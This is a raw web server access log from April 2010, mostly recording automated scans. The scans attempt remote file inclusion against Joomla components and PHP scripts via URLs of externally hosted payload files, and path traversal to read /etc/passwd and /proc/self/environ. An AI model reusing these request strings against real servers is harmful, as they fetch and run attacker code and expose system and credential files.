118.129.170.49 - - [23/Apr/2010:10:56:37 -0500] "GET /logs/access_log.1271030400//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:37 -0500] "GET /logs//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:37 -0500] "GET //votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:38 -0500] "GET /logs//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:40 -0500] "GET /logs/access_log.1271030400%20%20//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:10:56:41 -0500] "GET /logs//index.php?option=com_bsq_sitestats&i/wow.raids.free.fr//index.php?option=com_bsq_sitestats&mosConfig.absolute.path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:10:56:44 -0500] "GET //index.php?option=com_bsq_sitestats&i/wow.raids.free.fr//index.php?option=com_bsq_sitestats&mosConfig.absolute.path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:10:56:44 -0500] "GET /logs/access_log.1248652800//index.php?option=com_bsq_sitestats&i/wow.raids.free.fr//index.php?option=com_bsq_sitestats&mosConfig.absolute.path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:45 -0500] "GET //votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:45 -0500] "GET /logs//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:45 -0500] "GET /logs/access_log.1271030400%20%20//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:10:56:48 -0500] "GET /logs/access_log.1248652800//index.php?option=com_bsq_sitestats&i/wow.raids.free.fr//index.php?option=com_bsq_sitestats&mosConfig.absolute.path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:10:56:51 -0500] "GET /logs//index.php?option=com_bsq_sitestats&i/wow.raids.free.fr//index.php?option=com_bsq_sitestats&mosConfig.absolute.path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:59 -0500] "GET /logs/access_log.1265241600//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:59 -0500] "GET //votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:56:59 -0500] "GET /logs//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:57:06 -0500] "GET /logs/access_log.1265241600//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:57:06 -0500] "GET //votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
118.129.170.49 - - [23/Apr/2010:10:57:06 -0500] "GET /logs//votebox.php?VoteBoxPath=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:10:59:04 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:10:59:04 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:10:59:04 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:10:59:51 -0500] "GET /logs/access_log.1264896000//blocks/block_site_map.php?root_folder_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:10:59:51 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:10:59:51 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:10:59:56 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:10:59:57 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:10:59:57 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.8.3.157 - - [23/Apr/2010:10:59:57 -0500] "GET /logs/access_log.1264896000//blocks/block_site_map.php?root_folder_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:11:01:14 -0500] "GET //al_initialize.php?alpath=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:11:01:14 -0500] "GET /logs//al_initialize.php?alpath=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:11:01:15 -0500] "GET /logs/access_log.1265068800//al_initialize.php?alpath=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.81.84.11 - - [23/Apr/2010:11:02:24 -0500] "GET /logs/access_log.1212969600//index.php?option=com_juser&controllers=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.81.84.11 - - [23/Apr/2010:11:02:24 -0500] "GET //index.php?option=com_juser&controllers=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.81.84.11 - - [23/Apr/2010:11:02:24 -0500] "GET /logs//index.php?option=com_juser&controllers=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.81.84.11 - - [23/Apr/2010:11:02:30 -0500] "GET /logs/access_log.1212969600//index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.81.84.11 - - [23/Apr/2010:11:02:30 -0500] "GET //index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.81.84.11 - - [23/Apr/2010:11:02:30 -0500] "GET /logs//index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.81.84.11 - - [23/Apr/2010:11:03:38 -0500] "GET /logs//index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.81.84.11 - - [23/Apr/2010:11:03:38 -0500] "GET //index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
110.45.144.106 - - [23/Apr/2010:11:05:07 -0500] "GET /logs/access_log.1220054400///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
110.45.144.106 - - [23/Apr/2010:11:05:07 -0500] "GET ///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
110.45.144.106 - - [23/Apr/2010:11:05:07 -0500] "GET /logs///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
110.45.144.106 - - [23/Apr/2010:11:06:21 -0500] "GET /logs///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
110.45.144.106 - - [23/Apr/2010:11:06:21 -0500] "GET ///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
110.45.144.106 - - [23/Apr/2010:11:06:21 -0500] "GET /logs/access_log.1220054400///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:07:23 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:07:24 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:11:08:50 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:11:08:50 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:11:09:08 -0500] "GET /logs/access_log.1264896000//blocks/block_site_map.php?root_folder_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:11:09:08 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:13:24 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:13:24 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:13:24 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.174.185.131 - - [23/Apr/2010:11:13:24 -0500] "GET /logs/access_log.1220054400///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
211.174.185.131 - - [23/Apr/2010:11:13:25 -0500] "GET ///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
211.174.185.131 - - [23/Apr/2010:11:13:26 -0500] "GET /logs///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
211.174.185.131 - - [23/Apr/2010:11:14:22 -0500] "GET /logs/access_log.1219708800///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
110.45.144.106 - - [23/Apr/2010:11:16:05 -0500] "GET /logs/access_log.1219708800%20%20///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.13.85 - - [23/Apr/2010:11:16:24 -0500] "GET /logs/access_log.1184976000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.251.103.3 - - [23/Apr/2010:11:17:44 -0500] "GET /logs/access_log.1219708800///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
125.251.103.3 - - [23/Apr/2010:11:17:44 -0500] "GET ///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
125.251.103.3 - - [23/Apr/2010:11:17:45 -0500] "GET /logs///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
110.45.144.106 - - [23/Apr/2010:11:18:00 -0500] "GET /logs/access_log.1219708800%20%20///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.218.116.132 - - [23/Apr/2010:11:19:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
222.236.47.182 - - [23/Apr/2010:11:20:26 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.251.103.3 - - [23/Apr/2010:11:20:30 -0500] "GET /logs/access_log.1220054400///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
222.236.47.182 - - [23/Apr/2010:11:20:59 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
75.149.214.226 - - [23/Apr/2010:11:29:03 -0500] "GET /logs/access_log.1271030400//delete.php?board.skin.path=http://www.mumfordcomputing.com/Webcalendar/readme.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
75.149.214.226 - - [23/Apr/2010:11:29:03 -0500] "GET //delete.php?board.skin.path=http://www.mumfordcomputing.com/Webcalendar/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
75.149.214.226 - - [23/Apr/2010:11:29:03 -0500] "GET /logs//delete.php?board.skin.path=http://www.mumfordcomputing.com/Webcalendar/readme.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
207.46.13.139 - - [23/Apr/2010:11:30:55 -0500] "GET /logs/access_log.1267142400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.231.60.209 - - [23/Apr/2010:11:32:11 -0500] "GET /logs/send_reminders.php?includedir=http://www.assessingplanningtraining.com/modlogan/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.231.60.209 - - [23/Apr/2010:11:32:11 -0500] "GET /logs/access_log.1212969600%20%20/send_reminders.php?includedir=http://www.assessingplanningtraining.com/modlogan/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.231.60.209 - - [23/Apr/2010:11:32:11 -0500] "GET /send_reminders.php?includedir=http://www.assessingplanningtraining.com/modlogan/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.50.164.173 - - [23/Apr/2010:11:32:15 -0500] "GET //atom.php5?page=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.831"
64.50.164.173 - - [23/Apr/2010:11:32:15 -0500] "GET /logs/access_log.1220054400//atom.php5?page=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
64.50.164.173 - - [23/Apr/2010:11:32:15 -0500] "GET /logs//atom.php5?page=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
64.50.164.173 - - [23/Apr/2010:11:32:15 -0500] "GET /logs/access_log.1219363200//atom.php5?page=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
110.45.144.106 - - [23/Apr/2010:11:33:22 -0500] "GET /logs/access_log.1219708800///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
75.149.214.226 - - [23/Apr/2010:11:33:26 -0500] "GET /logs/access_log.1271030400//delete.php?board.skin.path=http://www.mumfordcomputing.com/Webcalendar/readme.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
75.149.214.226 - - [23/Apr/2010:11:33:26 -0500] "GET //delete.php?board.skin.path=http://www.mumfordcomputing.com/Webcalendar/readme.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
75.149.214.226 - - [23/Apr/2010:11:33:26 -0500] "GET /logs//delete.php?board.skin.path=http://www.mumfordcomputing.com/Webcalendar/readme.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
121.190.102.21 - - [23/Apr/2010:11:33:49 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:11:33:49 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [23/Apr/2010:11:33:49 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.131.106.30 - - [23/Apr/2010:11:35:00 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.30 - - [23/Apr/2010:11:35:01 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
207.46.199.195 - - [23/Apr/2010:11:35:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [23/Apr/2010:11:37:36 -0500] "GET /logs/access_log.1256342400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.49.100.254 - - [23/Apr/2010:11:39:56 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 346 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:11:39:56 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 319 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:11:39:56 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:11:39:57 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 346 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:11:39:57 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:11:39:57 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://sportsulsan.co.kr/poll/aipi/id.txt?%20? HTTP/1.1" 404 319 "-""Mozilla/5.0"
95.0.234.10 - - [23/Apr/2010:11:42:53 -0500] "GET /logs/access_log.1265760000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.129.119.43 - - [23/Apr/2010:11:46:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.0.234.10 - - [23/Apr/2010:11:48:08 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.13.137 - - [23/Apr/2010:11:50:25 -0500] "GET /artwork/mobiles.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [23/Apr/2010:11:56:16 -0500] "GET /logs//trans/trans.php?trans=&p=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:56:16 -0500] "GET //trans/trans.php?trans=&p=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:56:16 -0500] "GET /logs/access_log.1270684800%20%20//trans/trans.php?trans=&p=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:56:21 -0500] "GET /logs/access_log.1270684800%20%20//trans/trans.php?trans=&p=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:56:21 -0500] "GET //trans/trans.php?trans=&p=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:56:21 -0500] "GET /logs//trans/trans.php?trans=&p=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:56:37 -0500] "GET /logs//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:56:37 -0500] "GET /logs/access_log.1212969600%20%20//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:56:37 -0500] "GET //?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:57:17 -0500] "GET /logs/access_log.1270598400%20%20//trans/trans.php?trans=&p=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [23/Apr/2010:11:57:25 -0500] "GET /logs/access_log.1270598400%20%20//trans/trans.php?trans=&p=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:57:38 -0500] "GET //?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:57:38 -0500] "GET //?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:57:38 -0500] "GET //?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:57:38 -0500] "GET /logs/access_log.1212969600//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:57:38 -0500] "GET /logs/access_log.1212969600%20%20//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:57:38 -0500] "GET /logs/access_log.1212969600//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:57:38 -0500] "GET /logs//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:57:38 -0500] "GET /logs//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:57:38 -0500] "GET /logs//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:58:50 -0500] "GET /logs/access_log.1212969600//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:58:50 -0500] "GET /logs//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:58:50 -0500] "GET //?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:58:50 -0500] "GET /logs/access_log.1219708800//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:58:50 -0500] "GET /logs/access_log.1219708800//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:58:50 -0500] "GET //?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:58:50 -0500] "GET /logs/access_log.1212969600//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.114.135.218 - - [23/Apr/2010:11:58:50 -0500] "GET /logs//?include_path=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
